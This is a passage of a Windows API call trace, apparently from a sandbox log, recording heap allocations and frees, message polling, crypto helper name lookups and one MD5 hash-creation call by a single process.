lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0245.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0245.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0245.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0245.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0245.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0245.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0245.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0245.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0245.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0245.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0245.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0245.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0245.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0245.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0245.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0245.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0245.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0245.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0245.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0245.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0245.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0245.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0245.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0245.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0245.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0245.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0245.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0245.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0245.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0245.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0245.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0245.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0245.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0245.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0245.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0245.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0245.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0245.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0245.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0245.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0245.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0245.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0245.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0245.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0245.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0245.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0245.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0245.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0245.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0245.688] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0245.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0245.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0245.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0245.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0245.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0245.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0245.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0245.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0245.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0245.689] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a78 [0245.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0245.689] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0245.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a78 | out: hHeap=0x970000) returned 1 [0245.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0245.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0245.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0245.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0245.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0245.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0245.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0245.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0245.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0245.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0245.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0245.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0245.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0245.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0245.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0245.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0245.690] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0245.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0245.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0245.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0245.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.690] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0245.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0245.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0245.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0245.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0245.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0245.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0245.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0245.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0245.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0245.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0245.690] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0245.691] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0245.691] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f10 [0245.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0245.691] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0245.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f10 | out: hHeap=0x970000) returned 1 [0245.691] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0245.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0245.691] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0245.692] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0245.692] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0245.692] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0245.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0245.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0245.692] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0245.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ed8 [0245.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0245.692] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0245.692] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0245.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0245.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0245.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0245.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0245.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0245.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0245.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0245.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0245.693] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0245.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0245.693] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0245.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0245.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0245.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0245.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0245.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0245.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0245.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0245.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0245.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0245.694] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0245.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0245.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0245.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0245.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0245.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0245.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0245.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0245.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0245.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0245.694] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0245.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0245.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0245.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0245.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0245.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0245.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0245.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0245.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0245.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0245.694] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0245.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0245.695] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0245.695] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0245.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0245.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b90 [0245.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0245.695] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0245.695] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0245.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0245.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0245.695] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0245.695] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0245.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c00 [0245.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0245.695] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0245.696] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0245.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0245.696] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0245.696] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0245.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0245.696] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0245.696] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0245.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0245.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0245.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0245.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f80 [0245.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0245.696] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0245.696] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0245.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0245.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0245.697] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0245.697] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0245.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0245.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.697] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0245.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0245.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0245.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0245.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0245.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0245.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0245.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51388, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0245.697] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0245.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0245.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0245.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0245.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0245.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0245.698] RtlAllocateHeap 